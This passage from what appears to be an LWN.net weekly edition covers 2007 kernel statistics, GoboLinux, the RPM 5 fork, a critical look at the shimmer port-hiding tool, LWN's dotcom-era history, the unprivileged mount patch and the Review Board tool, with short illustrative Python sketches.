more than 750,000 lines.  The kernel developers are, in other words,
touching over 5,000 lines of code every day - that is a high rate of
change.
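
For those who want to check the per-day figures, the arithmetic is simple enough to sketch.  The totals below are the rounded numbers quoted above ("just over 30,000" changesets, "over 2 million" lines), so the results are lower bounds rather than exact values; the function name is an invention for this example.

```python
DAYS_IN_2007 = 365

def per_day(total, days=DAYS_IN_2007):
    """Average daily rate for a yearly total."""
    return total / days

changesets_per_day = per_day(30_000)        # rounded total from the text
lines_per_day = per_day(2_000_000)          # rounded total from the text
```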


The top contributors over the course of the year
(by changesets) were:


It should be noted that the employer numbers are more approximate than
usual.  Some developers changed employers in 2007, but LWN, as a matter of
policy, does not maintain a database of developers and their employers over
time.   Still, the picture is relatively constant - the same companies
continue to contribute approximately the same percentage of the patches
going into the kernel over relatively long periods of time.


Overall, the picture that results from all these numbers is one of a
widespread and healthy development community.  There appears to be no
shortage of jobs for kernel developers, but also room for those who work
outside of the office.  The kernel truly is a common resource, with
literally thousands of people working to improve it.  And it shows no signs
of slowing down anytime soon.


Your editor would like to profusely thank Greg Kroah-Hartman for his help
in improving these statistics.

		GoboLinux


GoboLinux is an alternative
distribution that redefines the entire filesystem hierarchy.  The
distribution joined the LWN Distributions List in late October 2003 at
version 007.  Now at version 014, the project has made quite a bit of
headway.  The website has been translated into several major languages,
along with much of the documentation.

An early article
written by GoboLinux creator Hisham Muhammad explains how the distribution
evolved from a custom Linux From
Scratch installation, and the motivation for changing the directory
structure.


The whole thing started when I had to install programs at the
University. As I had no write access to the standard Unix directories, I
created my own directories under $HOME the way I saw fit. I upgraded the
programs from source constantly, and couldn't use a package manager. My
solution was the most obvious one: to place each program in its own
directory, such as ~/Programs/AfterStep. Soon the environment variables
(PATH, LD_LIBRARY_PATH...) got bigger and bigger, so I created centralized
directories for each class of files, containing symbolic links:
~/Libraries, ~/Headers and so on. A natural evolution was to write shell
scripts to handle the links, configures and Makefiles.


I downloaded the 014 release and stuck the CD into my ancient Sony Vaio
laptop.  After booting I was first prompted for my preferred language and
keyboard settings and then taken to a console screen with text advising me
to "run startx to run the live CD or you can install from here."  I ran
startx and soon was looking at a familiar KDE desktop.  This release
features KDE 3.5.8, Glibc 2.5 and Xorg 7.2.  From here you'll find a
desktop icon for GParted and another to install GoboLinux, so you can
easily create a separate partition for GoboLinux before an installation.

I ran it as a live CD and brought up a Konsole so I could poke about the filesystem
hierarchy.  The home directory looks much like any other Linux system, but
a cd /, followed by ls -al reveals something else
entirely.  There are only six subdirectories here: Depot, Files, Mount,
Programs, System, and Users.  Depot proved to be empty, but the other
directories have their own subdirectories, which branch further as
necessary.  For example, I found everything needed to compile the Linux
kernel for a variety of architectures under
/Files/Compile/Sources/linux-2.6.23.8/ (the version used by this release).
To see all the installed programs just look at /Programs where each package
has its own subdirectory.  Different versions of the packages can also be
easily installed without conflict, since the directory structure includes
the version number, e.g. /Programs/Xorg/7.2/.
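
The scheme in Muhammad's description (one directory per program version, plus centralized directories of symbolic links) can be sketched as follows.  This is not GoboLinux's own tooling: the function name, the lib and include subdirectory names, and their mapping to Libraries and Headers are assumptions made for illustration, and the code needs a system that allows symbolic links.

```python
import os

# Assumed mapping from a program's subdirectories to the shared link trees.
CLASS_DIRS = {"lib": "Libraries", "include": "Headers"}

def link_program(root, name, version):
    """Point the shared link directories at one version of a program.

    Expects files under root/Programs/<name>/<version>/{lib,include}
    and returns the list of links created.
    """
    program_dir = os.path.join(root, "Programs", name, version)
    created = []
    for subdir, central in CLASS_DIRS.items():
        source_dir = os.path.join(program_dir, subdir)
        if not os.path.isdir(source_dir):
            continue
        link_dir = os.path.join(root, central)
        os.makedirs(link_dir, exist_ok=True)
        for entry in sorted(os.listdir(source_dir)):
            link = os.path.join(link_dir, entry)
            if os.path.islink(link):
                os.remove(link)  # repoint an older version's link
            os.symlink(os.path.join(source_dir, entry), link)
            created.append(link)
    return created
```

Because each version lives in its own directory, switching versions only means repointing links; nothing belonging to the other version is overwritten.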

The home directory for users is under /Users instead of /home, but it works
just the same.  As a long time Unix/Linux user I'm used to the old
hierarchy, with cryptic names like /etc and /bin.  I thought I might have a
hard time getting used to GoboLinux.  Instead, I found it intuitive and easy
to work with.  Next time you are looking for something different in a
desktop, give GoboLinux a try.

		The launch of RPM 5.0


Stable version 5.0.0 of RPM,
the rpm package manager, formerly known as the Red Hat package manager,
has been announced.  RPM5
is a fork of RPM; it should not be confused with the version used by Red
Hat, Fedora, SUSE, and others, which can still be found at rpm.org. 

The project description states:


RPM is a powerful and mature command-line driven package management system
capable of installing, uninstalling, verifying, querying, and updating Unix
software packages. Each software package consists of an archive of files
along with information about the package like its version, a description,
and the like. There is also a library API, permitting advanced developers
to manage such transactions from programming languages such as C, Perl or
Python.

Traditionally, RPM is a core component of many Linux distributions, including Red Hat Enterprise Linux, Fedora, Novell SUSE Linux Enterprise, openSUSE, CentOS, Mandriva Linux, and many others. But RPM is also used for software packaging on many other Unix operating systems like FreeBSD, Sun OpenSolaris, IBM AIX and Apple Mac OS X through the cross-platform Unix software distribution OpenPKG. Additionally, the RPM archive format is an official part of the Linux Standard Base (LSB).


The RPM5 developers certainly have a high opinion of what this release
brings:


The relaunch of the
RPM project in spring 2007 and today's following availability of RPM 5
marks a major milestone for the previously rather Linux-centric RPM. RPM
now finally evolved into a fully cross-platform and reusable software
packaging tool.


RPM Version 5.0.0 differs in numerous ways from other versions.
As noted above, the project aims to be cross-platform.
Much of the code is said to have been cleaned up and numerous bugs have been fixed.
The RPM build process has been completely rewritten to improve portability.
The code base has been ported to all of the major UNIX-based platforms
and Windows.  All of the most widely used open-source and proprietary
compilers are now supported.  Supported compression formats now include
bzip, bzip2 and LZMA.  Initial support has been added for XAR, the XML
Archive file format, while support for the old RPMv3 format has been
removed.  New package specification features have been added
and RPM 5 can now automatically track vendor distribution files.


In the last several years, the RPM project has been plagued by a bit of
controversy.  The issues mainly centered around maintenance of the
code and which version was used by Red Hat.
In August, 2006, LWN asked "Who maintains RPM?"  More recently, Ralf
S. Engelschall from the OpenPKG distribution has posted a blog entry that
discusses the project's history and considers which version is
"official".  Lastly, the initial RPM 5.0.0 announcement on LWN produced
some lively discussion of RPM issues.


The much-trumpeted release of RPM5 seems unlikely to put an end to this
controversy, to say the least.  RPM5 would appear to have a certain amount
of development energy and momentum, but it is not used by any major
distributions and it is not at all clear that this will change; in
particular, Red Hat and Fedora seem highly unlikely to drop their version
of RPM for RPM5.  So this fork - and the bad feelings that go along with it
- will probably persist indefinitely.  That's not what anybody would wish
for a crucial (and normally relatively boring) system tool like rpm.


		Hiding open ports with shimmer


Open TCP or UDP ports on an internet-facing host can be worrisome to an
administrator; they almost feel like an invitation to an attacker.  If a
service with an unknown or unpatched vulnerability is listening behind the
port, the host could be compromised.  Admins have come up with some
reasonable ways to deflect the simplest of these attacks: changing the
well-known port or port knocking.  The
new shimmer project provides
a twist, by using cryptographic techniques to choose the port to open.


The basic idea is that one port (within a chosen range) will be open to
real traffic of the service that the admin wants to hide – ssh or a private
web server, for example.  Both client and server can calculate the number
of that port using a secret that they share.  A
client that connects to the proper port gets forwarded to the real
service.  In addition to the proper port, 15 other ports are opened and
connected to a blacklist service.  Any connection made to those ports will
result in the source IP address being banned for 15 minutes.  The server
redoes the calculation each minute, coming up with a new set of 16 ports
– one good and 15 bad.


In order to calculate the port number, the shared secret (key) is combined
with the time (to the nearest minute), and the name of the service, then hashed using SHA-256.  The hash is used as an AES
key to encrypt the numbers 0 through 15.  Those values are mapped into the
port range and serve as the 16 port numbers for that minute.  In order to
handle small clock variations between client and server, the server
actually keeps each set of 16 open for three minutes – adding the set
for the minutes before and after the current one.
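
The derivation described above can be sketched in a few lines of Python.  This is an illustration only, not shimmer's code: the way the secret, time, and service name are joined, the default port range, and the function names are all assumptions.  Python's standard library has no AES, so HMAC-SHA-256 keyed with the hash stands in for the AES encryption step; the ports produced here will not match those of a real shimmer server.

```python
import hashlib
import hmac

def minute_ports(secret, service, unix_time, low=20000, high=29999):
    """Return 16 pseudo-random ports for the minute nearest unix_time."""
    minute = int((unix_time + 30) // 60)        # time to the nearest minute
    # Assumed encoding: secret, minute, and service name joined with "|".
    material = b"|".join([secret, str(minute).encode(), service.encode()])
    key = hashlib.sha256(material).digest()     # SHA-256 of the combination
    span = high - low + 1
    ports = []
    for i in range(16):
        # Stand-in for "AES-encrypt the number i with the hash as the key".
        block = hmac.new(key, bytes([i]), hashlib.sha256).digest()
        ports.append(low + int.from_bytes(block[:8], "big") % span)
    return ports  # duplicates are possible; a real tool must handle them

def server_sets(secret, service, unix_time, low=20000, high=29999):
    """Port sets for the previous, current, and next minute."""
    return [minute_ports(secret, service, unix_time + offset, low, high)
            for offset in (-60, 0, 60)]
```

A client whose clock is within a minute of the server's will compute a set that appears somewhere in the server's three-set window, which is the point of keeping the neighboring minutes open.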


While this scheme seems to provide a great deal of security for hiding an
open port, in reality it is more showy than useful.  As with simple port
knocking, or changing the well-known port number, it is vulnerable to an
attacker that can monitor traffic to the server and observe successful
connections.  Shimmer leaves three ports wide open at any given time with
45 ports that will cause an IP to get blacklisted.  Depending on the size
of the port range chosen, the odds of randomly guessing the right port
aren't that bad.  Someone with a few thousand IP addresses to use
probably won't have any difficulty.
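
To put rough numbers on those odds, here is a small sketch.  It assumes each source address makes one uniformly random guess, that the three good ports and 45 blacklisting ports do not overlap, and that guesses are independent; the function names and the range sizes tried are arbitrary choices for this example.

```python
def single_guess_odds(range_size, good=3, bad=45):
    """Chance that one random probe hits a good port, or a blacklisting one."""
    return good / range_size, bad / range_size

def any_success(range_size, addresses, good=3):
    """Chance that at least one of `addresses` single guesses is good."""
    miss = 1 - good / range_size
    return 1 - miss ** addresses

# 3,000 addresses, one guess each, against two hypothetical range sizes.
small_range = any_success(1_000, 3_000)
large_range = any_success(10_000, 3_000)
```

Under these assumptions, 3,000 addresses are all but certain to find the port in a 1,000-port range and still succeed about 59% of the time in a 10,000-port range.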


Much like the other techniques, shimmer will likely deflect all but the most
determined of attackers, but is unlikely to provide much in the way of
a barrier against those.  It sounds attractive and uses cryptographic terms
and techniques which may make it seem more secure than it really is.  Using
it without understanding this could lead to a false sense of security.


		Ten-year timeline, part 2: the bubble days


Last week, we began a
multi-part series looking at the soon-to-be ten years of LWN.  At the end
of that episode, we were coming to the realization that the training
business was, perhaps, not going to perform quite as well as our
spreadsheets had suggested it might.  It turns out that spreadsheets
created with free software can be just as deceptive as those done with
proprietary programs - who would have ever guessed?  So we decided to look into whether it
might be possible to make some sort of deal with some other company -
preferably one with some money - to keep the show going.


Just how one might go about looking for such a deal is not immediately
obvious - especially if you're a bunch of technical people who have no clue
about how corporate acquisitions are done.  Somehow, hanging an "Acquire
Us!" sign on the front page did not quite seem like the right way to go.
After some thought, we decided that the best approach might be to just
quietly slip the word to a few people that we might be open to offers, then
sit back and see what happened.  As it turned out, that was all we needed
to do.  Much of the following story has never been told - but all of the
non-disclosure agreements have run out by now, so this seems like the right
time. 


Meanwhile, things were happening at a furious pace in the Linux community.


 August 26, 1999: Red Hat
     and Caldera get around to year-2000 compliance.  The 2.3.15 patch is
     "huge", touching all of 600 files (2.6.24 currently has changes to
     over 10,000 files).  The first
     Ottawa Linux Symposium concludes.

 September 2, 1999: Sun
     buys StarDivision, but uses its "community source license" for the
     code.  Red Hat shuts down "Red Hat Linux" vendors on Amazon.

 September 9, 1999: SCO
     (old SCO, mind you, not the current company) trashes Linux in Europe.
     Bruce Perens worries that Sun may be trying to grab control of the
     Linux desktop through its acquisition of StarDivision.  Disruptive
     changes in the "stable" 2.2 kernel upset users.

 September 16, 1999: the
     2.3 kernel goes into "feature freeze," with Linus predicting a release
     by the end of the year.  He neglected to specify which year, though.
     Cobalt Networks files to go public.  LinuxOne - a company nobody had
     ever heard of - files to go public.  Andover.net (the company which
     had bought Slashdot) files to go public.  The first ext3 filesystem patches
     are released.


The 2.3 feature freeze is instructive - 2.4.0 was not released until
January, 2001 - 16 months after this "freeze" went into effect.  Over the
next months we'll see plenty of reasons for the delay in the 2.4.0 release;
Linus was famously not a great release manager.  But releases which failed
to arrive were the norm back in those days.  Free software was much like
proprietary software in that regard.  One has to look back to realize just
how much better we have gotten at getting software releases out in a
reasonable period of time.

The IPO filings were beginning to pile up - much to your editor's chagrin.
Actually reading those things is a painful chore, and we felt that
we needed to examine all of them.  The relative
newcomers out there may be wondering who that LinuxOne company is.  So were
we, at the time.  LinuxOne materialized out of thin air, slapped its name
onto a copy of Red Hat Linux, and called itself a Linux company.  They
clearly hoped to get in on the general mania and make a bunch of money
before people caught on - they nearly achieved it, too.


 September 30, 1999:
     Caldera spinoff Lineo gets going - remember Embedix and Embrowser?
     Red Hat drops LWN news from its web site.


Lineo got spun out of Caldera for a couple of apparent reasons: (1) to
isolate the DR-DOS lawsuit
which was being pursued against Microsoft, and (2) to 
try to double the number of public offerings.  The first objective was
achieved, and the suit was ultimately successful.  In the end, though,
Lineo still failed to get off the ground.


 October 7, 1999: Sun
     announces that it will be releasing the Solaris source code.  The
     OpenBSD project grabs the last freely-licensed version of ssh and
     starts the OpenSSH project.

 October 14, 1999:
     TurboLinux gets a big chunk of venture money.  SCO (old SCO) buys a
     chunk of the Linux Mall.  Crypto export rules in the U.S. begin to
     soften.  The devfs discussion continues.  SGI, VA Linux, and
     O'Reilly launch a commercialized version of the Debian distribution.
     VA Linux files for its IPO.


Old-timers will remember the Linux Mall - that was the place, once upon a
time, where we bought our Linux CDs (and stuffed penguins too).  Yes, we
actually bought Linux on CD and waited for it to show up via mail, though
it may seem a little strange now.  The Linux Mall, and its founder Mark
Bolzern, were fixtures in the early days of Linux.  As Linux grew and
bandwidth increased, though, the Linux Mall was having a bit of a hard time
of it.  The name was famous, though, and the site got a lot of traffic, so
companies interested in getting into the Linux hype were interested in it.  


It may be getting a bit ahead of the story, but this is as good a place as
any to let it be known that one of the things that the Linux Mall wanted to
do with its new-found wealth was to acquire a media outlet like LWN.  It
was part of the bigger plan of creating a full-featured e-commerce "mall"
centered around Linux.  We considered the offer long and hard, but, in the
end, declined it.  Just as well: the Linux Mall missed the IPO boat and got
folded into EBIZ, which, in turn, eventually went bankrupt.  Had we taken
that path, there would be no LWN now.


 October 21, 1999:
     LinuxToday is acquired by Internet.com; co-founder Dave Whitinger leaves
     the building.  ATI announces that it will be releasing 3D programming
     information for its video adapters - the good news here is that it's
     finally getting around to doing that.

 November 4, 1999: DVD
     encryption is cracked and DeCSS is released.  The Y2K-related
     "windowing" patent threatens the kernel.  Burn all GIFs day.  The
     kernel gets past the longstanding 1GB limit on installed memory.  Slackware 7 (the
     successor to Slackware 4) is released.  The non-profit Red Hat Center
     for Open Source launches - and is never heard from again.

 November 11, 1999: Cobalt
     Networks goes public; shares begin trading at $130.

 November 18, 1999: The Linux
     Business Expo is held as part of the once-famous COMDEX event.  Red Hat
     acquires Cygnus.  BitKeeper is said to be getting closer to release.
     Mozilla hits milestone 11 and is said to be getting closer to
     release.  Advogato.org launches.


LWN has only rarely operated booths at conferences, but we did have one at
the Comdex Linux Business Expo.  For the curious, here's a picture from
the event featuring LWN editor Rebecca Sobol.  That week's LWN edition
was produced from that booth after the floor closed, under the watchful eye
of security guards who didn't think we should be there.  Your editor
remembers it as one of the coldest experiences of his life.  During the
show, we were subjected to constant, highly-amplified screaming obnoxiousness from the
large booth being run by LinuxToday - the acquisition, it seemed, had put
that site onto a rather less dignified path.


The other thing LWN was doing at this event was talking with potential
suitors.  One of those was a company called Atipa, which was operating a large booth of
its own.  Atipa was a VA-style Linux box vendor with a grand plan for a
Linux portal site which would, eventually, be the place people went
for Linux information.  They thought that LWN would make a good
addition to that portal, and were pushing hard to make a deal.


We met a few times with Atipa's CEO, a charismatic man who told a good
story.  The company, he said, was going to outdo even the coming VA Linux IPO, which
was already clearly going to be big.  Along the way he was going to pick up
companies like Applix and open-source the ApplixWare office suite -
something which would have been nice at the time.  He stated flat out that
he was soon to be a billionaire, and that we could share in that bonanza.
It was quite the tale, but we tended to walk out of these meetings
believing every word of it.


With some distance, though, the glow always faded.  We wondered why our
visit to the company's headquarters revealed a building almost devoid of
people.  The magic "profit happens here" step in their plans seemed less
inevitable when looked at later. 
In the end, we did not take this deal.  Thereafter, we received
(unverifiable) word that Atipa's 
investors started asking some harder questions and found that, perhaps,
they, too, had allowed themselves to be charmed more than they should
have.  Atipa rather abruptly found a new CEO, the IPO never happened, and
investors, presumably, lost their money.


Also at the Linux Business Expo, we met with some representatives from
O'Reilly.  They were getting the O'Reilly network off the ground, and
thought that LWN might make a good addition to it.  They eventually offered us
a deal (which looked more like a traditional angel investment than an
acquisition) and a network 
affiliation which would have given us a portion of the revenue from the ads
they sold.  Your editor, who has a lot of respect for the people at O'Reilly, has
always had a bit of regret at turning down this offer.  It was an
opportunity to get business advice from some very smart people.  But it
would almost certainly have been fatal to LWN once the advertising market
fell apart. 


Meanwhile, the acquisition of Cygnus by Red Hat led to a fair amount of
online worrying about whether Red Hat was set to take over Linux by virtue
of employing a number of GCC developers.  Such fears look a little silly
now, but they seemed real then.


 December 9, 1999:
     Andover.net goes public.  The kernel gets NUMA support (during a
     feature freeze, remember).
     Sun announces a Linux Java release, rolling over the "Blackdown" team
     which had been working on this release for years.

 December 12, 1999: VA
     Linux goes public, setting the record for the largest first-day gain
     in NASDAQ history.  Eric Raymond gets rich and
     lets us all know about it.
     The non-free BitKeeper license is revealed.  LinuxCare acquires the
     Puffin Group and gets another $32 million.  The Linux Capital Group
     launches; it starts by funding Progeny Linux.  Companies send out "we use
     Linux" press releases in an attempt to make their stock price go up.


The VA IPO was not just the peak of the Linux bubble - it could well be the
peak of the dotcom bubble as a whole.  It was not possible to watch that
stock rise to well over $300 a share on the first day and not be
overwhelmed by a sense of unreality.  Still, it seemed like no more than
what Linux deserved, and people somehow expected it to continue.


 January 6, 2000: Linux
     survives Y2K.  Red Hat buys Hell's Kitchen Software, does nothing with
     it.  VA Linux launches the SourceForge site.

 January 13, 2000: Caldera
     Systems (later to become SCO) files for its IPO.  The kernel gets a
     new block driver API and 32-bit UIDs - still during the feature freeze.

 January 20, 2000:
     LinuxCare files for its IPO.  Linus Torvalds shuts down the sale of a
     number of Linux-related domain names.  Secure Computing Corporation
     announces that it will be developing (what becomes) SELinux.  Enoch
     becomes Gentoo Linux.  TurboLinux completes another funding round.


Once upon a time, Caldera Systems was supposed to be among the biggest
winners in the distribution sector - they had the business connections and
the distribution channels.  "Linux for business" got the company far enough
to do an IPO, but not much beyond that.  This is, of course, the company
which eventually became the SCO Group.


Caldera was well overshadowed by LinuxCare, though.  The distribution
business always looked like a hard one to maintain over the long term -
that is why Red Hat was trying to be a web portal company.  Services were
going to be the real gold mine, and LinuxCare was going to be at the top of
the Linux support industry.  The company got money from left and right (a
funding round produced offers of ten times the target amount) and hired a
long list of well-known Linux hackers.


Need we say that LWN's editors paid a visit to LinuxCare during this time?
It was a hard time for LinuxCare to discuss acquisitions, since the IPO
process was already underway, but discuss they did.  So we went to the
famous San Francisco headquarters.  Your editor's memories from that day
are strong.  LinuxCare was filled with hundreds of people who all believed
they were on the way toward an IPO that would exceed even VA Linux; suffice
to say they were happy about the prospect.  Meanwhile, though, a couple
hundred of them were all working in a single not-very-large room called
"the barn"; it resembled, more than anything else, a school lunchroom
filled with long tables.  Everybody worked on a laptop because there was no
room in their tiny piece of table space for anything else.  They all
complained about having colds.  It looked awful.


LinuxCare's negotiator was an ex-fighter jet pilot who retained the "top 
gun" attitude.  When valuations were discussed, we were told that offering
LinuxCare's pre-IPO shares at $50-60 each was being generous to us.  Issues
like editorial control were not really even on the table.  In the end, we
turned this deal down, but with the feeling that we were throwing a winning
lottery ticket in the trash.  Of course, subsequent events showed that we
need not have worried about this particular missed opportunity.


 February 10, 2000:
     Real-time Linux turns out to be patented.  VA Linux acquires
     Andover.Net.  The KDE project moves to SourceForge.  Atipa acquires
     Enhanced Software Technologies.  The Linux Fund announces that it will
     be filing for an IPO.


The Andover.Net acquisition was announced at LinuxWorld in New York - LWN
was there, of course.  The initial deal included a massive pile of cash to
be handed to Andover.Net's shareholders, but people questioned that handout
to the extent that it eventually went away.  Andover.Net's owners had to content
themselves mostly with VA Linux shares, which, already, were worth considerably
less than they had been on IPO day.  In the end, Andover.Net turned out to
be a good buy for VA Linux, once it became clear that the Linux-installed
computer business was harder than it had looked.


We were approached by a VA executive at LinuxWorld to see if we were
interested in maybe being acquired sometime.  By then, though, we had so
many offers that we couldn't really give them all serious consideration.
So we did not pursue that opportunity.

But, at this event, we did talk with some representatives from ZDNet, who
were also looking for a Linux site to buy.  The offer they made was, by
far, the most generous of any.  By some reckoning, we should have taken it.
Certainly it would have come out better than most of the other options we
had.  But ZDNet would have exercised more editorial control than we would
have liked, and, being already a public company, it didn't offer that IPO
"pop" that we somehow thought was our due.  So we ended up not taking that
path. 


 February 17, 2000: devfs
     is merged into the mainline kernel.  Also merged is the "softnet" core
     networking rework.  Remember, the kernel is in a feature freeze.

 February 24, 2000: Eazel
     is founded with the goal of improving Linux usability.


To your editor, Eazel never made sense from the beginning.  There was,
truly, no revenue model.  Indeed, it seemed like a scam designed to draw
venture money for the purpose of writing Nautilus.  To that extent it
succeeded, but the investors cannot have been happy in the end.


 March 2, 2000: Atipa
     announces $30 million in investments.

 March 23, 2000: Caldera
     Systems goes public; its share price merely doubles.  The planned date
     for LinuxCare's IPO passes with no offering.

 April 4, 2000: Linuxcare's
     IPO is pushed back to April 24 - or so they say.  EBIZ acquires
     longtime Linux CD distributor InfoMagic.  Atipa Linux Solutions
     acquires DCG Computer Corp.  Sendmail Inc. gets $35 million in
     funding. 


This was the point where LWN announced that it had been acquired
by a company called Tucows.  We had, in fact, been talking with them for
some months, and had made the decision in February.  It took some time,
though, for the lawyers to hammer out the final agreement.  In the end, we
were probably exceedingly lucky: market conditions were going downhill in a
hurry by this point and, had the negotiations stretched out much longer,
Tucows might have started looking for reasons to back out of the deal.


Or maybe not.  We went with Tucows for a number of reasons, but at the top
of the list was that they were clearly smart and decent people who,
while arguably being carried away by the bubble like the rest of us,
clearly had a functioning business underneath it all.  Their acquisition of
LWN never yielded the benefits they were looking for, but the people at
Tucows always treated us well and we still count them as friends.  Perhaps
we were smart, or perhaps we were just very lucky, but, in retrospect, we
came out of a complex, high-stakes process having made what was probably
the best possible decision.


The Tucows acquisition made it possible for LWN editors Rebecca Sobol and
Forrest Cook to join as regular staff members.  It also positioned us
within a safe harbor for the dotcom crash, which was already in progress.
But the story of those years will be the subject of next week's
installment.

		Unprivileged mounts


There are a number of filesystem-related patches aimed at the upcoming
2.6.25 merge window; one of those is the unprivileged mount patch by
Miklos Szeredi.  This patch enables an unprivileged user process to call
the mount() system call and - in certain circumstances - have that
call actually succeed.  It could eventually lead to a situation where users
have more flexibility to create their own environments and the setuid
mount utility is no longer needed.


This patch adds a new field (uid) to the vfsmount
structure, allowing the kernel to keep track of the owner of a specific
filesystem mount.  The system administrator can give ownership of a
specific mount to a user with the new MNT_SETUSER flag.  A common
pattern might be to bind-mount a user's home directory on top of itself,
giving the user the ownership of that mount.  Once that
has been done, the user is allowed to freely mount other filesystems below
that mount point - with a couple of conditions:


 There is a system-wide limit on the number of allowed user mounts;
     once that limit is hit, no more unprivileged mounts will be allowed
     until somebody unmounts something.  The current patch has no provision
     for per-user or per-group mount limits, but such a feature would not
     be particularly hard to add should the need arise.

 The filesystem type must be marked as being safe for unprivileged
     mounts.  Miklos notes that a filesystem must go through "a thorough
     audit" before this flag can be set with any confidence.  The patch, as
     posted, marks the fuse filesystem (which allows for the creation of
     filesystems implemented in user space) as being safe; fuse was
     designed for this mode of operation in the first place.  Bind mounts
     are also allowed, with some additional conditions.


If the system allows the mount, the flags allowing for setuid and device
files will be forcibly cleared - unless the user has the requisite
capabilities anyway.  Users are allowed to unmount filesystems they own,
again without privilege, but cannot unmount any others.  Another new mount
flag (MNT_NOMNT) marks a specific filesystem as being the end of
the line - no unprivileged submounts are allowed below it.
The end result of
all this should be a mechanism by which users can organize their filesystem
hierarchies without any need for administrative privileges, and without the
risk of compromising system security.
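
The rules described above amount to a small decision procedure.  What
follows is a toy model in Python, not the kernel code: the Mount class,
the SAFE_FSTYPES set, the MAX_USER_MOUNTS value, and the may_mount() and
may_umount() functions are all hypothetical names chosen for illustration.
Only the uid field and the MNT_SETUSER and MNT_NOMNT flags come from the
patch description.  The sketch also leaves out bind mounts and the case of
a user who holds the requisite capabilities.

```python
from dataclasses import dataclass
from typing import Optional, Set, Tuple

# Illustrative assumptions, not values taken from the patch.
MAX_USER_MOUNTS = 2          # system-wide limit on user mounts
SAFE_FSTYPES = {"fuse"}      # filesystem types audited as safe


@dataclass
class Mount:
    """Toy stand-in for the kernel's vfsmount structure."""
    path: str
    uid: Optional[int] = None    # owner, as assigned with MNT_SETUSER
    nomnt: bool = False          # models MNT_NOMNT: no submounts below


def may_mount(parent: Mount, uid: int, fstype: str, flags: Set[str],
              user_mounts: int) -> Tuple[bool, Set[str]]:
    """Decide whether an unprivileged user may mount below `parent`.

    `user_mounts` is the current system-wide count of user mounts.
    Returns (allowed, effective_flags).
    """
    if parent.uid != uid:                # the user must own the parent mount
        return False, set()
    if parent.nomnt:                     # end of the line
        return False, set()
    if fstype not in SAFE_FSTYPES:       # type must be marked safe
        return False, set()
    if user_mounts >= MAX_USER_MOUNTS:   # system-wide limit reached
        return False, set()
    # Setuid and device files are forcibly disabled on the new mount.
    return True, set(flags) | {"nosuid", "nodev"}


def may_umount(mount: Mount, uid: int) -> bool:
    """Users may unmount only the filesystems they own."""
    return mount.uid == uid
```

With a mount of /home/alice owned by uid 1000, a call like
may_mount(home, 1000, "fuse", {"rw"}, 0) succeeds in this model and comes
back with nosuid and nodev added to the flags; the same call for an ext3
filesystem, or from a different uid, is refused.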


One might well wonder why this change to the mount() system call
is called for, given that users have been able to do unprivileged mounts
for years.  The answer is that the current mechanism has a couple of
shortcomings.  Every potential unprivileged mount must be explicitly
enabled via a line in /etc/fstab.  That works well for simple
situations, such as allowing a user to mount a CD or a USB storage device.
When users start wanting to do more complicated things, like mounting their
own special fuse filesystems, the /etc/fstab mechanism breaks
down.  There is a separate, setuid program which grants the right to make
unprivileged fuse mounts, but it represents a workaround rather than a
proper solution.


The current user mount mechanism also requires that the mount
utility be installed setuid root.  Every setuid binary is a potential
security hole, so there is value in eliminating privileged programs when
possible.  The unprivileged mount patch offers the possibility of
eliminating the setuid mount program while simultaneously leaving policy
control in the hands of the system administrator.  So, unless something
surprising comes up, chances are good that this capability will appear in
the 2.6.25 kernel.

		Making code reviews easier with Review Board


Reviewing code is a thankless, but very important, task for any
software project.  For free software projects, the "many eyes make all bugs shallow" aphorism only works if
the eyes actually focus on the code in question.  Review Board is a web-based
application that helps reviewers examine the code, while making it easier
for a developer to track those reviews.


Born out of frustration with the process of code reviews at VMware, Review
Board has made a great deal of progress since being released last May.  The idea
behind it is to centralize all of the pieces that need to come together for
a review: code diffs, screenshots of UI functionality, comments by other
developers, etc.  On many projects, reviews are handled by email, but that can
be difficult to use; various pieces of the puzzle are spread around in
multiple messages and locations.

 Often a reviewer needs to see more context than a simple email diff
provides or wants to comment on a related section of code that is not
contained in the diff; each requires a reviewer to do more work.  In a
complicated set of changes, ensuring that the developer and any other
reviewers can follow what code the comments pertain to can also be
difficult.  It is these kinds of problems that Review Board is meant to
solve.  

 Review Board presents a side-by-side diff view, shown at right, with
lots of extras, many of which will be familiar to users of other graphical
diff tools.  Changed lines are highlighted in different colors based on
whether they are additions, deletions, or changes.  Changes on a particular
line are highlighted in a slightly darker color so that they can be
distinguished more easily as well.  The numbered tabs along the left edge
provide a link to a reviewer's comments about that section of the code.
This is where Review Board shows that it is much more than just a diff
viewer.  

Using AJAX
techniques, Review Board allows a reviewer to interact very naturally with
the code.  They can highlight a certain section, which will pop up a
text widget that records comments associated with that section of code.
When other reviewers or the developer read those comments, the code snippet
is included, with a link back to the code in the diff view.  Each of these
comments can then be commented upon, which allows a conversation about the
code to develop.


It is not just code that can be annotated; screenshots of application
functionality or bugs can be attached to
reviews, as well. Sections of the screenshot can be highlighted and
commented upon, as shown at left.  This feature is an excellent example of
where a web-based tool can shine; doing the same task in text-based email
would be painful.  Not all projects need it, but those
that do will find it quite useful, as anyone who has spent time trying to
describe a UI problem in email will attest.


Inter-diffs is another useful feature that Review Board provides.  Often in
the code review process, several revisions of the original patch are made.
It can be tedious to wade through a large diff, most of which has been
uncontroversial (or resolved earlier) to get to the changes in the area of
interest.  Review Board can show the changes between any two
revisions of the patch, which should reduce much of the hassle. 


Another thing that Review Board does is to assist in managing code
reviews.  When a developer posts something for review, various reviewers
can be notified via email.  Review Board keeps track of that information,
presenting users with a "dashboard" view of their pending reviews, both
those they submitted and those that others have asked them to do.  This
high-level overview is the first screen the user sees when they log on to
the system, shown at right.  This makes keeping track of work that needs to
be done – or
who to prod to get a review moving again – much easier.

 Currently, Review Board best supports the Subversion and Perforce
version control systems (VCS), but support for others, including the
distributed VCSs Mercurial and git, is being actively developed and is
usable in its current state.  Released under an MIT license, Review
Board is written in Python, using the Django web framework.  Development
is hosted at Google Code; the
developers, 
unsurprisingly, use the software for internal code reviews.

Other systems to assist in the code review process do exist.  Codestriker is a Perl-based
web application that has similar aspirations to Review Board.  Also of
interest is Python creator Guido van Rossum's first project at Google: a code review
system he calls "Mondrian".
It is closely tied to Google proprietary code, though, so it seems unlikely to be
released as free software – though it might make an appearance as a
tool for 
Google Code projects to use. 

 Code reviews are very powerful, but generally painful to perform; any
tool that claims that "Code reviews are fun again!
...almost.", as Review Board does, will be welcomed by many.  It
will be interesting to see whether a code review tracker becomes a standard
part of newer free software projects.  Over the last few years, we have
seen the rise of distributed VCS, bug trackers, and wikis to assist in
distributed development. Will Review Board – or something like it
